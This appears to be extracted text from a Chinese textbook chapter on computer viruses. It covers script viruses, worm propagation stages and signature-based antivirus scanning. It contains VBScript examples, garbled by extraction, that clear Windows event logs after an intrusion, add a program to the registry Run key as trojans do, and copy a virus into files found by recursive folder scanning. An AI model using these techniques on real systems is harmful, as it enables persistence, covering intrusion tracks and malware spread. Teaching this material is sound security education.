【文章內容簡介】 腳本病毒是以腳本程序語言 (如 VB Script、 JavaScript、PHP)編寫而成的病毒。腳本是指從一個數(shù)據(jù)文檔中執(zhí)行一個任務的一組指令，這一點與宏相似 (有時宏和腳本可以交替使用 )。與宏相同，腳本也是嵌入到一個靜止的文件中的，它們的指令是由一個應用程序而不是由計算機的處理器運行的。 第 13章 計算機病毒 腳本程序的執(zhí)行離不開 WSH(Windows Scripting Host，Windows腳本宿主 )環(huán)境， WSH內嵌于 Windows操作系統(tǒng)中的腳本語言工作環(huán)境，主要負責腳本的解釋和執(zhí)行。 WSH是微軟提供的一種基于 32位 Windows平臺、與語言無關的腳本解釋機制，它使得腳本能夠直接在 Windows桌面或命令提示符下運行。 WSH依賴于 IE提供的 VB Script和 JavaScript腳本引擎，所對應的程序“ C: ＼ Windows＼ ”是一個腳本語 第 13章 計算機病毒 創(chuàng)建腳本病毒只需簡單的編程知識，它們的代碼盡可能精簡。腳本病毒可以使用 Windows中預先定義的對象來更容易地訪問被感染系統(tǒng)的其他部分。腳本病毒的代碼為文本編寫，其他人很容易讀取并模仿，因此，很多腳本病毒都有變體。腳本病毒都是使用應用程序和操作系統(tǒng)中的自動腳本功能來復制和傳播惡意腳本的。它主要通過電子郵件和網頁進行傳播。 第 13章 計算機病毒 目前，網絡中的惡意代碼開始威脅到網絡系統(tǒng)的安全，一般分為如下幾種 : (1) 消耗系統(tǒng)資源。通過不斷消耗本機系統(tǒng)資源，使計算機不能處理其他進程，導致系統(tǒng)與網絡癱瘓。這類病毒大多是利用 JavaScript產生一個死循環(huán)，它可以在有惡意的網站中出現(xiàn)，也可以被當做郵件的附件發(fā)給用戶，當用戶打開 .htm、 .vbs附件時，屏幕出現(xiàn)無數(shù)個瀏覽器窗口，使系 統(tǒng)資源耗盡，最后不得不重新啟動主機。 第 13章 計算機病毒 (2) 非法向用戶的硬盤寫入文件。這類主要是在網頁或 (3) IE 下面用 VB Script實例來說明腳本病毒的編寫方法。在記事本中輸入編輯病毒程序，然后保存為以 .vbs為后綴的文件， 第 13章 計算機病毒 例 131 黑客入侵系統(tǒng)成功后，第一件事便是清除日志，日志也是一種運行服務，但不同于 、 ftp這樣的服務，它可以在命令行下先停下，再刪除。在命令行下用 eventlog是不能停止日志服務的，所以在命令行下刪除日志是很困難的。如果利用 VBS腳本編程就比較容易刪除日志。 第 13章 計算機病毒 源代碼如下 : strComputer= . Set objWMIService = GetObject(winmgmts: _ {impersonationLevel=impersonate， (Backup)}!＼＼ _strComputer ＼ root＼ cimv2) dim mylogs(3) mylogs(1)=application 第 13章 計算機病毒 mylogs(2)=system mylogs(3)=security for Each logs in mylogs Set colLogFiles=(Select * from Win32_NTEventLogFile where LogFileName=′logs′) For Each objLogfile in colLogFiles () Next Next 第 13章 計算機病毒 在上面的代碼中，首先獲得 object對象，然后利用其ClearEventLog ( )方法刪除日志。 例 132 向 Windows中添加自啟動程序，使該程序在開機時自動運行，一般木馬程序常常使用該方法將病毒添加到被攻擊者的系統(tǒng)中。假設該程序在 C: ＼ xxdk 第 13章 計算機病毒 源代碼如下 : Dim 56Program Set AutoRunProgram=() RegPath=HKLM＼ Software＼ Mcirosoft＼ Windows＼CurrentVersion＼ Run＼ Type_Name=REG_SZ Key_Name=56 Key_Data=C: ＼ xxdk＼ //該自啟動程序的全路徑 RegPathKey_Name， Key_Data，Type_Name //在啟動組中添加自啟動 程序 MsgBox(success!) 第 13章 計算機病毒 蠕蟲病毒是一種通過網絡傳播的惡性病毒，它具有病毒的一些共性，如傳播性、隱蔽性、破壞性等。但是蠕蟲病毒和一般病毒又有很大的區(qū)別，它具有自己的一些特性。蠕蟲病毒自身副本具有完整性和獨立性，不利用文件寄生 。 其復制形式是自身拷貝，通過系統(tǒng)漏洞進行傳染 。 對網絡產生拒 絕服務，以及和黑客技術相結合等 。 在產生的破壞性上，也是普通病毒所不能比擬的，網絡的發(fā)展可以使蠕蟲病毒在短 第 13章 計算機病毒 1. 蠕蟲病毒的基本程序結構分為傳播模塊、隱藏模塊和目的功能模塊。傳播模塊負責蠕蟲病毒的傳播 。 隱藏模塊在侵入主機后，隱藏蠕蟲病毒程序，防止被用戶發(fā)現(xiàn) 。 目的功能 第 13章 計算機病毒 2. 蠕蟲病毒的一般傳播過程分為掃描、攻擊和復制幾個階 (1) 掃描 : 由蠕蟲病毒的掃描功能模塊負責探測存在漏洞的主機。當程序向某個主機發(fā)送探測漏洞的信息并收到成功 (2) 攻擊 : 攻擊模塊按漏洞攻擊步驟自動攻擊步驟 (1)中找到的對象，取得該主機的權限 (一般為管理員權限 )，獲得一個 shell 第 13章 計算機病毒 (3) 復制 : 復制模塊通過原主機和新主機的交互將蠕蟲 我們可以看到，傳播模塊實現(xiàn)的實際上是自動入侵的功能，所以蠕蟲病毒的傳播技術是蠕蟲病毒技術的首要技術，沒有蠕蟲病毒的傳播技術，也就談不上蠕蟲病毒技術了。 第 13章 計算機病毒 現(xiàn)在流行的蠕蟲病毒采用的傳播技術的目標一般是盡快地傳播到盡量多的計算機中，于是掃描模塊采用的掃描策略是這樣的 : 隨機選取某一段 IP地址，然后對這一地址段上的主機進行掃描。這樣，隨著蠕蟲病毒的傳播，新感染的主機也開始進行這種掃描，這些掃描程序不知道那些地址已經被掃描過，它只是簡單地隨機掃描互聯(lián)網。于是蠕蟲病毒傳播得越廣，網絡上的掃描包就越多。 雖然掃描程序發(fā)出的探測包很小，但是積少成多，大量蠕蟲病毒的掃描所引起的網絡 第 13章 計算機病毒 掃描發(fā)送的探測包是根據(jù)不同的漏洞進行設計的。比如，針對遠程緩沖區(qū)的溢出漏洞可以發(fā)送溢出代碼來探測，針對Web的 CGI漏洞就需要發(fā)送一個特殊的 請求來探測。當然，發(fā)送探測代碼之前首先要確定相應的端口是否開放，這樣可以提高掃描效率。一旦確認漏洞存在后就可以進行 相應的攻擊步驟，不同的漏洞有不同的攻擊手法，只要明白 第 13章 計算機病毒 攻擊成功后，一般是獲得一個遠程主機的 shell，對Windows 2023 , shell后就擁有了對整個系統(tǒng)的控制權。復制過程也有多種方法，可以利用系統(tǒng)本身的程序實現(xiàn)，也可以用蠕蟲病毒自帶的程序實現(xiàn)。復制過程實際上就是一個文件傳輸?shù)倪^程，實現(xiàn)網絡文 件傳輸很簡單。 蠕蟲病毒的工作方式如圖 1334 第 13章 計算機病毒 圖 1334 蠕蟲病毒的工作方式 第 13章 計算機病毒 例 133 模仿蠕蟲病毒，設計一個簡單的病毒模塊， 使其具有創(chuàng)建病毒文件體、搜索程序中病毒標記、感染滿足 生成一個文件副本，將病毒代碼拷入其中，并以原文件名作為病毒文件名的前綴，以 .vbs 第 13章 計算機病毒 以下是文件感染部分的關鍵代碼 : set fso=createobject(“ ” ) 。 set self=(， 1) 。讀打開當前文件 (病毒本身 ) vbscopy= 。讀取病毒全部代碼到字符串變量 vbscopy 第 13章 計算機病毒 set ap=(， 2， ture) 。打開 AA vbscopy 。 set cop=() 。得到 AA ( “ .vbs” ) 。創(chuàng)建另一個病毒文件 (以 .vbs為后綴 ) (ture) 。刪除 AA文件 第 13章 計算機病毒 上面描述了病毒文件是如何傳染正常文件的 : 首先將病毒自身代碼賦給字符串變量 vbscopy，然后將這個字符串寫到AA文件中，并創(chuàng)建一個以 AA為文件名的 vbs副本，然后刪除AA 搜索部分 scan( ) 函數(shù)采用了一個遞歸的算法遍歷整個分 第 13章 計算機病毒 //該函數(shù)主要用來尋找滿足條件的文件，并生成對應文 sub scan(folder_) 。scan on error resume next 。如果出現(xiàn)錯誤，直接跳過，防止 set folder=(folder_) set files= 。 for each file in filesext=(file) 。 ext=lcase(ext) 。 第 13章 計算機病毒 if ext=“ ***” then 。如果后綴名是 ***(虛構的后綴 名 ) (file) end if next set subfolders=folder_subfolders for each subfolder in subfolders 。搜索其他目錄 : 遞歸調用 scan( ) scan(subfolder) next end sub 第 13章 計算機病毒 病毒的出現(xiàn)是必然的，病毒也必將長期存在。反病毒技術因病毒的出現(xiàn)而出現(xiàn)，并隨病毒技術的發(fā)展而發(fā)展，也必 反 病 毒 技 術 第 13章 計算機病毒 1. 特征值掃描技術是反病毒軟件檢測病毒所采用的一種最簡單、也是最流行的方法，主要源于模式匹配的思想。反病毒軟件提供商首先收集病毒樣本并采集它們的指紋。成千上萬的病毒特征值被收集到一個數(shù)據(jù)庫中，供病毒掃描器對比時使用。病毒特征值庫被分發(fā)到受保護的計算機系統(tǒng)中，當反病毒軟件掃描文件時，將當前的文件與病毒特征碼進行對比，并檢測是否有文件片斷與已知的病毒樣本吻合。病毒特征值類似于圖 1341中一個用十六進制字符表示的代碼片段，基于病毒特征值的探測器會把它識別為屬于某個病毒的特征 第 13章 計算機病毒 圖 1341 病毒特征值 第 13章 計算機病毒 對于基于病毒特征值的檢測方法，最大的挑戰(zhàn)是只有特征值庫中包含了這個特征碼，才能利用這個特征值從受害系統(tǒng)中檢測出該病毒。這意味著反病毒軟件必須不斷地收集和分發(fā)特征值庫，但是，即使快速、頻繁地進行更新，匹配病毒特征值的方法仍然有不可克服的缺點。其中原因之一是， 只要病毒制作者稍稍修改病毒代碼，對于特征值庫來說，這又是一個新的病毒，也就是說，病毒特征值庫總是走在病毒之后。另外，病毒制造者可能會創(chuàng)造一個定制的病毒，使其一直保持偽裝直至感染上特定的目標，由于沒有廣泛傳播，反病毒軟件開發(fā)人員就有可能漏掉這種病毒的特征碼。 第 13章 計算機病毒 反病毒軟件無法阻止大規(guī)模的破壞。該檢測方法另一個大的弱點在于，若一類計算機病毒在傳播過程中自動改變自身形態(tài)，不斷改變其代碼，從而使